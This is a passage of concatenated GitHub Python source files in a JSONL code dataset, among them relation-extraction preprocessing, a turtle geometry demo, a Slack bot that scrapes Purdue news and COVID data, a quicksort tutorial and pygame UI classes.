len(document[\"ner\"]) > 1:\n\n # create all the possible entity pairs\n entity_pairs = permutations(document[\"ner\"], 2)\n\n for entity_pair in entity_pairs:\n\n # set the entity tokens to inject in the instance\n ent1_start = f'<E1:{entity_pair[0][2]}>'\n ent1_end = f'</E1:{entity_pair[0][2]}>'\n ent2_start = f'<E2:{entity_pair[1][2]}>'\n ent2_end = f'</E2:{entity_pair[1][2]}>'\n\n # build the instance sentence for the model\n sentence_marked = ''\n\n for idx_token in range(len(document[\"sentence\"])):\n\n # nested entities begin\n if idx_token == entity_pair[0][0] and idx_token == entity_pair[1][0]:\n # entity 1 is the biggest: entity 1 encapsulates entity 2\n if entity_pair[0][1] > entity_pair[1][1]:\n sentence_marked += f'{ent1_start} {ent2_start} {document[\"sentence\"][idx_token]} '\n # entity 2 (the shortest one) is one token long\n if idx_token == entity_pair[1][1]:\n sentence_marked += f'{ent2_end} '\n # entity 2 is the biggest: entity 2 encapsulates entity 1\n else:\n sentence_marked += f'{ent2_start} {ent1_start} {document[\"sentence\"][idx_token]} '\n # entity 1 (the shortest one) is one token long\n if idx_token == entity_pair[0][1]:\n sentence_marked += f'{ent1_end} '\n\n # match begin entity 1\n elif idx_token == entity_pair[0][0]:\n sentence_marked += f'{ent1_start} {document[\"sentence\"][idx_token]} '\n # entity 1 is one token long\n if idx_token == entity_pair[0][1]:\n sentence_marked += f'{ent1_end} '\n # entity 1 is a nested entity encapsulated inside entity 2\n if idx_token == entity_pair[1][1]:\n sentence_marked += f'{ent2_end} '\n # match begin entity 2\n elif idx_token == entity_pair[1][0]:\n sentence_marked += f'{ent2_start} {document[\"sentence\"][idx_token]} '\n # entity 2 is one token long\n if idx_token == entity_pair[1][1]:\n sentence_marked += f'{ent2_end} '\n # entity 2 is a nested entity encapsulated inside entity 1\n if idx_token == entity_pair[0][1]:\n sentence_marked += f'{ent1_end} '\n\n # nested entities end\n elif idx_token == entity_pair[0][1] and idx_token == entity_pair[1][1]:\n # entity 1 in the biggest: entity 1 encapsulates entity 2\n if entity_pair[0][0] < entity_pair[1][0]:\n sentence_marked += f'{document[\"sentence\"][idx_token]} {ent2_end} {ent1_end} '\n # entity 2 in the biggest: entity 2 encapsulates entity 1\n else:\n sentence_marked += f'{document[\"sentence\"][idx_token]} {ent1_end} {ent2_end} '\n\n # match end entity 1\n elif idx_token == entity_pair[0][1]:\n sentence_marked += f'{document[\"sentence\"][idx_token]} {ent1_end} '\n # match end entity 2\n elif idx_token == entity_pair[1][1]:\n sentence_marked += f'{document[\"sentence\"][idx_token]} {ent2_end} '\n\n # regular token\n else:\n sentence_marked += f'{document[\"sentence\"][idx_token]} '\n\n # retrieve relation label\n dataset_relations = [(e1_s, e1_e, e2_s, e2_e, rel, exp, ns, sa) for (e1_s, e1_e, e2_s, e2_e, rel, exp, ns, sa) in document[\"relations\"] if e1_s == entity_pair[0][0] and e1_e == entity_pair[0][1] and e2_s == entity_pair[1][0] and e2_e == entity_pair[1][1]]\n\n # prepare data\n if len(dataset_relations) > 0:\n if multi_label:\n instance_labels = [0] * len(labels2id.keys())\n for elem in dataset_relations:\n instance_labels[labels2id[elem[4]]] = 1\n relations.append(instance_labels)\n else:\n relations.append(labels2id[dataset_relations[0][4]])\n sentences.append(sentence_marked.strip())\n entities_1.append(sentence_marked.split(' ').index(f'{ent1_start}'))\n entities_2.append(sentence_marked.split(' ').index(f'{ent2_start}'))\n\n return sentences, entities_1, entities_2, relations\n","repo_name":"mainlp/CrossRE","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"37"} +{"seq_id":"5878414939","text":"from math import sqrt\r\nimport turtle\r\n\r\ndef draw_rect(rect, canvas):\r\n if rect.point1.x < rect.point2.x:\r\n first = rect.point1\r\n third = rect.point2\r\n else:\r\n first = rect.point2\r\n third = rect.point1\r\n\r\n second = Point(third.x, first.y)\r\n fourth = Point(first.x, third.y)\r\n\r\n canvas.penup()\r\n canvas.goto(rect.point1.x, rect.point1.y)\r\n canvas.pendown()\r\n canvas.forward(first.distance_from_point(second))\r\n canvas.left(90)\r\n canvas.forward(second.distance_from_point(third))\r\n canvas.left(90)\r\n canvas.forward(third.distance_from_point(fourth))\r\n canvas.left(90)\r\n canvas.forward(fourth.distance_from_point(first))\r\n\r\n\r\n\r\nclass Rectangle:\r\n def __init__(self, point1, point2):\r\n \"\"\"\r\n Tuple in input\r\n :param lowleft: angolo in basso a sx\r\n :param upright: angolo in basso a dx\r\n \"\"\"\r\n self.point1 = point1\r\n self.point2 = point2\r\n\r\n def area(self):\r\n return (self.point2.x - self.point1.x) * (self.point2.y - self.point1.y)\r\n\r\n\"\"\"guirectangle è child rectangle è parent\"\"\"\r\nclass GuiRectangle(Rectangle):\r\n\r\n def draw(self, canvas):\r\n draw_rect(Rectangle(self.point1, self.point2), canvas)\r\n\r\n\r\nclass Point:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n def falls_in_rectangle(self, rect):\r\n \"\"\"Con le tuple non possiamo considerare di prendere l' n-esimo elemento, dobbiamo\r\n considerare la x e la y (rect.lowleft.x, rect.upright.x)\"\"\"\r\n if rect.point1.x <= self.x <= rect.point2.x and rect.point1.y <= self.y <= rect.point2.y:\r\n return True\r\n else:\r\n return False\r\n\r\n def distance_from_point(self, point):\r\n return int(((self.x - point.x)**2 + (self.y - point.y)**2)**0.5)\r\n\r\nclass GuiPoint(Point):\r\n\r\n def draw(self, canvas, size=5, color='red'):\r\n canvas.penup()\r\n canvas.goto(self.x, self.y)\r\n canvas.pendown()\r\n canvas.dot(size, color)\r\n\r\n\r\nclass House:\r\n def __init__(self, wall_area):\r\n self.well_area = wall_area\r\n\r\n def paint_needed(self):\r\n return self.well_area *2.5\r\n\r\n\r\nclass Paint:\r\n def __init__(self, buckets, color):\r\n self.buckets = buckets\r\n self.color = color\r\n\r\n def total_price(self):\r\n if self.color == \"white\":\r\n return self.buckets * 1.99\r\n else:\r\n return self.buckets * 2.19\r\n\r\n\r\nclass DiscountedPaint(Paint):\r\n def discounted_price(self, discount_percentage):\r\n tp = self.total_price()\r\n return tp - (tp * discount_percentage/100)\r\n\r\nif __name__ == '__main__':\r\n p_start = Point(90, 90)\r\n p = GuiPoint(180, 280)\r\n p_stop = Point(300, 300)\r\n rect = Rectangle(p_start, p_stop)\r\n gui_rect = GuiRectangle(p_start, p_stop)\r\n my_turtle = turtle.Turtle()\r\n gui_rect.draw(canvas=my_turtle)\r\n p.draw(canvas=my_turtle, size=20)\r\n\r\n turtle.done()\r\n\r\n","repo_name":"Nines89/kivy","sub_path":"Advanced Python/GeometryGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9741131108","text":"from python_paypal_api.api import Identity, Products\nfrom python_paypal_api.base import PaypalApiException\nimport logging\n\n\ndef py_list_products(**kwargs):\n\n logging.info(\"---------------------------------\")\n logging.info(\"Catalog > list_products()\")\n logging.info(\"---------------------------------\")\n\n credentials = dict(\n client_id=\"your-client-id\",\n client_secret=\"your-client-secret\",\n client_mode=\"your-mode\" # PRODUCTION OR SANDBOX(default)\n )\n\n try:\n\n result = Products(credentials=credentials, store_credentials=False, debug=True).list_products(\n **kwargs\n )\n document_dict = result.payload\n logging.info(result)\n\n except Exception as error:\n logging.info(error)\n\n\ndef py_get_userinfo():\n\n logging.info(\"---------------------------------\")\n logging.info(\"Identity > py_get_userinfo\")\n logging.info(\"---------------------------------\")\n\n try:\n\n # result = Identity(account=\"production\", store_credentials=True, debug=True).get_userinfo(\n result = Identity(debug=True).get_userinfo(\n )\n logging.info(result)\n\n except PaypalApiException as error:\n logging.error(error)\n\n except Exception as error:\n logging.info(error)\n\nif __name__ == '__main__':\n\n logger = logging.getLogger(\"test\")\n \n py_get_userinfo()\n \n py_list_products(\n total_required=True,\n page_size=1,\n page=2\n )\n","repo_name":"denisneuf/python-paypal-api","sub_path":"docs/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"25708763910","text":"'''\nWrite a script that prints out all the squares of numbers from 1- 50\n\nUse a for loop that demonstrates the use of the range function.\n\n'''\n\nn = 0\nfor i in range(1, 50+1):\n n = i ** 2\n print(n)","repo_name":"igorlongoria/python-fundamentals","sub_path":"04_conditionals_loops/04_10_squares.py","file_name":"04_10_squares.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4528707348","text":"import os\nfrom typing import Any, Dict, List\nimport re\nfrom datetime import datetime\n\nimport atoma\nimport json\nimport feedparser\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nfrom .processors import process_bylines\nfrom .database import get_database_connection\nfrom matplotlib import pyplot as plt\n\nimport numpy as np\nimport pandas as pd\n\nxml_urls = [\n \"https://www.purdue.edu/newsroom/rss/academics.xml\",\n \"https://www.purdue.edu/newsroom/rss/AdvNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/AgriNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/BizNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/community.xml\",\n \"https://www.purdue.edu/newsroom/rss/DiversityNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/EdCareerNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/EventNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/faculty_staff.xml\",\n \"https://www.purdue.edu/newsroom/rss/FeaturedNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/general.xml\",\n \"https://www.purdue.edu/newsroom/rss/HealthMedNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/hrnews.xml\",\n \"https://www.purdue.edu/newsroom/rss/InfoTech.xml\",\n \"https://www.purdue.edu/newsroom/rss/LifeNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/LifeSciNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/OTCNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/outreach.xml\",\n \"https://www.purdue.edu/newsroom/rss/PhysicalSciNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/PRFAdminNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/ResearchNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/StudentNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/VetMedNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/AgNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/DiscoParkNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/EdNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/engineering.xml\",\n \"https://www.purdue.edu/newsroom/rss/HHSNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/ITaPNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/CLANews.xml\",\n \"https://www.purdue.edu/newsroom/rss/LibrariesNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/KrannertNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/NEESnews.xml\",\n \"https://www.purdue.edu/newsroom/rss/NursingNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/PharmacyNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/president.xml\",\n \"https://www.purdue.edu/newsroom/rss/PRFNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/ScienceNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/TechNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/VetNews.xml\",\n]\n\n\ndef directory_search(searchName: str) -> Dict[str, Any]:\n \"\"\"Helper function to search names in the Purdue Directory\n\n Arguments:\n searchName (str): the name to be queried in the Purdue Directory.\n\n Returns:\n A Dict in Slack format.\n \"\"\"\n requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += \"HIGH:!DH:!aNULL\"\n try:\n requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHER_LIST += (\n \"HIGH:!DH:!aNULL\"\n )\n except AttributeError:\n # no pyopenssl support used / needed / available\n pass\n\n # POST UP LEBRON!!!\n r = requests.post(\"https://purdue.edu/directory\", data={\"searchString\": searchName})\n soup = BeautifulSoup(r.text, \"html.parser\")\n\n result = soup.findAll(id=\"results\")\n\n ret_list = []\n\n for row in result[0].findAll(\"ul\")[0].findAll(\"li\"):\n tmp = []\n # find the name\n for h2 in row.findAll(\"h2\"):\n tmp.append(h2.text)\n\n # find the rest of the information\n for td in row.findAll(\"td\"):\n tmp.append(td.text)\n\n ret_list.append(tmp)\n\n result_str = \"results\" if len(ret_list) else \"result\"\n\n ret_blocks = {\n \"blocks\": [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f'Found *{len(ret_list)}* {result_str} for: \"{searchName}\"',\n },\n },\n {\"type\": \"divider\"},\n ]\n }\n\n for result in ret_list:\n ret_blocks[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"{result[0]} \\nemail: {result[2]}\\ncampus: {result[3]}\\ncollege: {result[4]}\",\n },\n }\n )\n\n return ret_blocks\n\n\ndef get_pngs() -> List[List[str]]:\n \"\"\"Retrieves a list of three-wide arrays from the Purdue PNG website.\n\n Returns:\n A list of rows representing information about PNGs.\n \"\"\"\n r = requests.get(\n \"https://www.purdue.edu/ehps/police/assistance/stats/personanongrata.html\"\n )\n\n soup = BeautifulSoup(r.text, \"html.parser\")\n table = soup.find(summary=\"Persona nongrata list\")\n\n ret_list = []\n\n for tr in table.find_all(\"tr\"):\n td = tr.find_all(\"td\")\n row = [i.text.strip() for i in td]\n if len(row) != 0:\n ret_list.append(row)\n\n return ret_list\n\n\ndef send_slack(title: str, link: str, date: str, is_pr: bool = False) -> None:\n \"\"\"A helper function that sends messages to a specified Slack channel.\n\n Arguments:\n title (str): A string representing the title of the message.\n link (str): A string representing a possible link to attach with the message\n date (str): When the press release was released.\n is_pr (bool): A boolean representing whether the incoming Slack message\n is a press release or otherswise.\n\n Returns:\n None\n \"\"\"\n\n if os.getenv(\"SEND_SLACK\") != \"True\":\n return\n\n if \"http\" not in link:\n link = \"http://{}\".format(link)\n\n payload = {\n \"channel\": os.getenv(\"SLACK_CHANNEL\"),\n \"text\": title,\n \"token\": os.getenv(\"SLACK_TOKEN\"),\n \"blocks\": [],\n }\n\n block_array = [\n {\"type\": \"section\", \"text\": {\"type\": \"mrkdwn\", \"text\": f\"{title}\"}},\n {\n \"type\": \"context\",\n \"elements\": [{\"type\": \"mrkdwn\", \"text\": f\"Posted on {date}\"}],\n },\n ]\n\n if is_pr:\n block_array[0][\"text\"] = {\"type\": \"mrkdwn\", \"text\": f\"<{link}|{title}>\"}\n block_array[0][\"accessory\"] = {\n \"type\": \"button\",\n \"text\": {\"type\": \"plain_text\", \"text\": \"Take Me!\"},\n \"value\": \"take\",\n \"action_id\": \"button\",\n }\n\n payload[\"blocks\"] = json.dumps(block_array)\n\n # logging.debug(payload)\n r = requests.post(\"https://slack.com/api/chat.postMessage\", params=payload)\n\n r.raise_for_status()\n\n\ndef get_bylines(query: str) -> List[Dict[str, Any]]:\n \"\"\"Helper function to retrieve reporter bylines for the current payperiod.\n\n Returns:\n List[Dict[str, Any]]\n A list of Slack blocks containing reporter information.\n \"\"\"\n\n date_regex_string = r\"[0-9]*[0-9]/[0-9]*[0-9]/[12][09][012][0-9]\"\n\n date_regex_match = re.findall(date_regex_string, query)\n\n if len(date_regex_match) == 2:\n start_str = date_regex_match[0]\n end_str = date_regex_match[1]\n else:\n d = datetime.now()\n if d.day <= 15:\n start_str = f\"{d.month}/1/{d.year}\"\n end_str = f\"{d.month}/15{d.year}\"\n else:\n start_str = f\"{d.month}/16/{d.year}\"\n end_str = f\"{d.month}/{d.day}/{d.year}\"\n\n campus_search_string = f\"https://www.purdueexponent.org/search/?q=&nsa=eedition&t=article&c[]=campus&l=100&s=start_time&sd=desc&f=rss&d1={start_str}&d2={end_str}\"\n city_search_string = f\"https://www.purdueexponent.org/search/?q=&nsa=eedition&t=article&c[]=city_state&l=100&s=start_time&sd=desc&f=rss&d1={start_str}&d2={end_str}\"\n sports_search_string = f\"https://www.purdueexponent.org/search/?q=&nsa=eedition&t=article&c[]=sports&l=100&s=start_time&sd=desc&f=rss&d1={start_str}&d2={end_str}\"\n\n campus_feed = feedparser.parse(campus_search_string)\n city_feed = feedparser.parse(city_search_string)\n sports_feed = feedparser.parse(sports_search_string)\n\n entry_list = campus_feed.entries + city_feed.entries + sports_feed.entries\n\n bylines = process_bylines(entry_list)\n\n ret_blocks = {\"blocks\": []}\n\n ret_blocks[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"{len(bylines.keys())} reporters wrote articles between {start_str} and {end_str}\",\n }, # noqa\n } # noqa\n )\n\n ret_blocks[\"blocks\"].append({\"type\": \"divider\"})\n\n for reporter in bylines.keys():\n res_articles = \"\"\n for article in bylines[reporter][\"articles\"]:\n res_articles = res_articles + f\"* {article}\\n\"\n res_string = f\"{reporter}: {bylines[reporter]['count']} \\n{res_articles}\"\n ret_blocks[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": res_string,\n }, # noqa\n } # noqa\n )\n\n return ret_blocks\n\n\ndef get_quote() -> Dict[str, Any]:\n \"\"\"Helper function to get and process daily quotes.\"\"\"\n\n r = requests.get(\"http://api.quotable.io/random\")\n\n data = r.json()\n\n tipp_daily_total = 0\n\n corona_r = requests.get(\n \"https://hub.mph.in.gov/api/3/action/datastore_search?resource_id=8b8e6cd7-ede2-4c41-a9bd-4266df783145&q=Tippecanoe\"\n )\n\n while len(corona_r.json()[\"result\"][\"records\"]) > 0:\n corona_data = corona_r.json()[\"result\"]\n tipp_daily_total += sum(\n [record[\"COVID_COUNT\"] for record in corona_data[\"records\"]]\n )\n corona_r = requests.get(\n \"https://hub.mph.in.gov\" + corona_data[\"_links\"][\"next\"]\n )\n\n ret_blocks = {\"blocks\": []}\n\n ret_blocks[\"blocks\"].append(\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"good morning! here's a quote to get your day started ʕ•́ᴥ•̀ʔっ\\n\\\"{data['content']}\\\" - {data['author']}\\nthere are {tipp_daily_total} COVID-19 cases in tippecanoe county, according to the isdh (╥﹏╥)\",\n }, # noqa\n } # noqa\n )\n\n payload = {\n \"channel\": os.getenv(\"SLACK_RANDOM\"),\n \"text\": \"hey! it's ur morning update (づ。◕‿‿◕。)づ\",\n \"token\": os.getenv(\"SLACK_TOKEN\"),\n \"blocks\": json.dumps(ret_blocks[\"blocks\"]),\n }\n\n r = requests.post(\"https://slack.com/api/chat.postMessage\", params=payload)\n\n r = requests.get(\n \"https://hub.mph.in.gov/api/3/action/datastore_search_sql?sql=SELECT%20%22DATE%22,%20SUM(%22COVID_COUNT%22)%20as%20COVID_COUNT%20from%20%2246b310b9-2f29-4a51-90dc-3886d9cf4ac1%22%20WHERE%20%22COUNTY_NAME%22%20LIKE%20%27Tippecanoe%27%20GROUP%20BY%20%22DATE%22%20ORDER%20BY%20%22DATE%22%20DESC%20LIMIT%2030\"\n )\n\n covid_list = []\n index = []\n columns = [\"covid_count\"]\n\n for record in r.json()[\"result\"][\"records\"]:\n covid_list.append(int(record[\"covid_count\"]))\n index.append(pd.to_datetime(record[\"DATE\"]))\n\n df = pd.DataFrame(covid_list, index=index, columns=columns)\n\n filename = datetime.now().strftime(\"%b_%d_%Y\") + \".png\"\n\n series = df[\"covid_count\"][::-1]\n\n sma = []\n window = []\n\n for value in series:\n if len(window) < 7:\n window.append(value)\n else:\n window.pop(0)\n window.append(value)\n\n sma.append(np.average(window))\n\n with plt.style.context(\"fivethirtyeight\"):\n plt.figure(figsize=(16, 9))\n plt.title(\n f\"no. of new cases per day in last 30 days ({datetime.fromisoformat(r.json()['result']['records'][0]['DATE']).strftime('%b %d, %Y')})\"\n )\n plt.xticks(rotation=30)\n plt.bar(\n np.arange(len(index)), df[\"covid_count\"][::-1], label=\"daily no. of cases\"\n )\n plt.plot(sma, color=\"gold\", label=\"seven day moving average\")\n plt.xticks(range(len(index)), [date.strftime(\"%b %d\") for date in index[::-1]])\n plt.legend()\n plt.savefig(filename, bbox_inches=\"tight\", pad_inches=0.5)\n\n payload = {\n \"channels\": [os.getenv(\"SLACK_RANDOM\")],\n \"text\": \"look at this graph 🎶\",\n \"file\": filename,\n \"token\": os.getenv(\"SLACK_TOKEN\"),\n }\n\n graph_file = {\"file\": (filename, open(filename, \"rb\"), \"png\")}\n\n r = requests.post(\n \"https://slack.com/api/files.upload\", params=payload, files=graph_file\n )\n\n r.raise_for_status()\n\n return ret_blocks\n\n\ndef rss_reader():\n conn = get_database_connection()\n\n for url in xml_urls:\n response = requests.get(url)\n if response.status_code == 404:\n continue\n feed = atoma.parse_rss_bytes(response.content)\n for post in feed.items:\n\n query_result = conn.run(\n \"select true from press_releases where title=:title and link=:link\",\n title=post.title,\n link=post.link,\n date=post.pub_date,\n )\n\n if len(query_result) > 0:\n continue\n\n query_result = conn.run(\n \"insert into press_releases values (:title, :link, :date)\",\n title=post.title,\n link=post.link,\n date=post.pub_date,\n )\n\n send_slack(\n post.title,\n post.link,\n post.pub_date.strftime(\"(%Y/%m/%d)\"),\n is_pr=True,\n )\n\n conn.commit()\n\n for row in get_pngs():\n if len(row[0]) == 0:\n continue\n\n query_result = conn.run(\n \"select true from pngs where name=:name and location=:location and expiration=:expiration\",\n name=row[0],\n location=row[1],\n expiration=row[2],\n )\n\n if len(query_result) > 0:\n continue\n\n query_result = conn.run(\n \"insert into pngs (name, location, expiration) values (:name, :location, :expiration)\",\n name=row[0],\n location=row[1],\n expiration=row[2],\n )\n print(f\"PNG issued to {row[0]} expiring on {row[2]}. Banned from {row[1]}\")\n send_slack(\n f\"PNG issued to {row[0]} expiring on {row[2]}. Banned from {row[1]}\",\n \"\",\n \"\",\n )\n\n conn.commit()\n conn.close()\n","repo_name":"fatcat2/tippecanews","sub_path":"tippecanews/utils/retrievers.py","file_name":"retrievers.py","file_ext":"py","file_size_in_byte":14475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17232649389","text":"# Quick Sort is a widely used sorting algorithm that follows the divide and conquer paradigm. It's an efficient, in-place method offering superior performance in real-world sorting applications. \n\n# The worst-case time complexity is O(n^2), however, on average, it performs impressively with a time complexity of O(n log n).\n\n# The algorithm operates by choosing a 'pivot' from the array and partitioning the remaining elements into two sub-arrays, according to whether they are less than or greater than the pivot. \n# The pivot selection and partitioning steps occur in-place, meaning they require minimal additional space.\n# After partitioning, the algorithm recursively applies the same logic to the sub-arrays. Over several iterations, this results in a fully sorted array.\n\n# Algorithm:\n# 1. The quick_sort function initially selects a pivot element from the array.\n# 2. Using the partition function, it organizes the array such that elements lesser than the pivot come before it and those greater come after it.\n# 3. The quick_sort function is then recursively applied to the sub-arrays formed by the partitioning step.\n\n# Time Complexity: On average, Quick Sort operates in O(n log n), where 'n' is the number of elements. In the worst-case scenario, its performance degrades to O(n^2).\n\n# Space Complexity: The space complexity of Quick Sort is O(log n), due to the recursive nature of the algorithm storing function calls on the call stack.\n\n# Implementation of Quick Sort in Python:\n\ndef partition(array, low, high):\n # Choose the rightmost element as pivot\n pivot = array[high]\n\n i = low - 1\n\n # Partitioning: move all elements smaller than pivot to the left, greater to the right\n for j in range(low, high):\n if array[j] <= pivot:\n i = i + 1\n (array[i], array[j]) = (array[j], array[i])\n\n # Swap pivot element with the element at the i-th position\n (array[i + 1], array[high]) = (array[high], array[i + 1])\n\n # Return the position of the pivot\n return i + 1\n\ndef quick_sort(array, low, high):\n if low < high:\n # Find pivot position\n pi = partition(array, low, high)\n\n # Recursively perform quicksort on the partitioned sub-arrays\n quick_sort(array, low, pi - 1)\n quick_sort(array, pi + 1, high)\n\n# Sample Input\ninput_array = [8, 7, 2, 1, 0, 9, 6]\nsize = len(input_array)\n\nprint(\"Original Array: \", input_array)\nquick_sort(input_array, 0, size - 1)\n\nprint(\"Sorted Array: \", input_array)\n\n# Sample Input\n# input_array = [8, 7, 2, 1, 0, 9, 6]\n\n\n# Sample Output\n# input_array = [0, 1, 2, 6, 7, 8, 9]\n\n# Note: Quick Sort algorithm works by manipulating the input array in-place and doesn't work well with arrays that are already sorted or nearly sorted.","repo_name":"avantikachauhann/Algorithm-Alchemy","sub_path":"Python/Sorting/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"38318332651","text":"import pygame\nfrom ui.ui_tool_tip import UITooltip\n\n\nclass UITextButton(pygame.sprite.Sprite):\n def __init__(self, position, dimensions, text, font, ui_group, tool_tip_text=None):\n super().__init__(ui_group)\n self.ui_group = ui_group\n self.font = font\n self.text = text\n\n # support for an optional 'tool tip' element attached to this button\n self.tool_tip_text = tool_tip_text\n self.tool_tip = None\n\n # colours, we could grab these from a separate colour theme class that we use across ui elements, much like a\n # css file provides colours and styles to a group of HTML we pages\n self.text_colour = pygame.Color('#000000')\n self.normal_colour = pygame.Color('#f9eaae')\n self.hover_colour = pygame.Color('#cdf9ae')\n\n # different states our button can be in, could use a state machine for this if you wanted\n # could also add a 'selected' state like windows has.\n self.hovered = False\n self.held = False\n self.pressed = False\n\n # time the hovering\n self.hover_time = 0.0\n self.tool_tip_appear_time = 1.0\n\n self.text_surface = self.font.render(self.text, True, self.text_colour)\n\n self.image = pygame.Surface(dimensions)\n self.rect = self.image.get_rect(x=position.x, y=position.y)\n\n # this helps us draw the text in the center of our button\n self.text_centred_rect = self.text_surface.get_rect(centerx=self.rect.centerx-self.rect.x,\n centery=self.rect.centery-self.rect.y)\n\n self.redraw()\n\n def shutdown(self):\n self.kill()\n if self.tool_tip is not None:\n self.tool_tip.kill()\n\n def update(self, time_delta, window_surface):\n mouse_x, mouse_y = pygame.mouse.get_pos()\n\n if self.rect.collidepoint(mouse_x, mouse_y):\n if not self.hovered:\n self.hovered = True\n self.hover_time = 0.0\n self.redraw()\n\n if self.tool_tip is None and self.tool_tip_text is not None and self.hover_time > self.tool_tip_appear_time:\n self.tool_tip = UITooltip(self.tool_tip_text, self.ui_group)\n self.tool_tip.find_valid_position(pygame.math.Vector2(mouse_x, self.rect.centery), window_surface)\n\n self.hover_time += time_delta\n\n else:\n if self.hovered:\n self.hovered = False\n self.redraw()\n if self.tool_tip is not None:\n self.tool_tip.kill()\n self.tool_tip = None\n\n if self.held:\n self.held = False\n\n def process_event(self, event):\n processed_event = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n mouse_x, mouse_y = event.pos\n if self.rect.collidepoint(mouse_x, mouse_y):\n self.held = True\n processed_event = True\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n mouse_x, mouse_y = event.pos\n if self.rect.collidepoint(mouse_x, mouse_y):\n if self.held:\n self.held = False\n processed_event = True\n self.pressed = True\n\n return processed_event\n\n def redraw(self):\n if self.hovered:\n self.image.fill(self.hover_colour)\n else:\n self.image.fill(self.normal_colour)\n\n self.image.blit(self.text_surface, self.text_centred_rect)\n\n def check_pressed_and_reset(self):\n if self.pressed:\n self.pressed = False\n return True\n else:\n return False\n","repo_name":"MyreMylar/nautical_adventure","sub_path":"ui/ui_text_button.py","file_name":"ui_text_button.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30665054004","text":"# coding: utf-8\n\n'''\nIt is possible to show that the square root of two can be expressed as an infinite continued fraction.\n\nsqrt(2) = 1 + 1/(2 + 1/(2 + 1/(2 + ... ))) = 1.414213...\n\nBy expanding this for the first four iterations, we get:\n\n1 + 1/2 = 3/2 = 1.5\n1 + 1/(2 + 1/2) = 7/5 = 1.4\n1 + 1/(2 + 1/(2 + 1/2)) = 17/12 = 1.41666...\n1 + 1/(2 + 1/(2 + 1/(2 + 1/2))) = 41/29 = 1.41379...\n\nThe next three expansions are 99/70, 239/169, and 577/408, but the eighth expansion, 1393/985, is the first example where the number of digits in the numerator exceeds the number of digits in the denominator.\n\nIn the first one-thousand expansions, how many fractions contain a numerator with more digits than denominator?\n'''\n\n\n# from http://math.arizona.edu/~thakur/cf2.pdf,\n# Denominator D(n+1) = D(n) + N(n) | Numerator N(n+1) = N(n) + 2*D(n))\n\n\ndef main():\n numerator, denominator, result = 3, 2, 0\n for _ in range(10 ** 3):\n numerator, denominator = numerator + 2 * denominator, numerator + denominator\n if len(str(numerator)) > len(str(denominator)):\n result += 1\n return result\n\n\nif __name__ == '__main__':\n print(main())\n # 153 in 3.98ms\n","repo_name":"adrienbrunet/EulerProject","sub_path":"problem_057.py","file_name":"problem_057.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27407267573","text":"import pygame\nfrom datetime import datetime, timedelta\nfrom player import Player\nfrom settings import *\nfrom bullet import Bullet\n\n\nclass Gamer(Player):\n\n def __init__(self, aliens, gamers, game_over):\n Player.__init__(self, GAME_WIDTH - PLAYER_WIDTH / 2, GAME_HIGH - PLAYER_HEIGHT / 2, image=\"sniper\")\n self.aliens = aliens\n self.gamers = gamers\n self.last_shot = datetime.now()\n self.game_over = game_over\n\n def 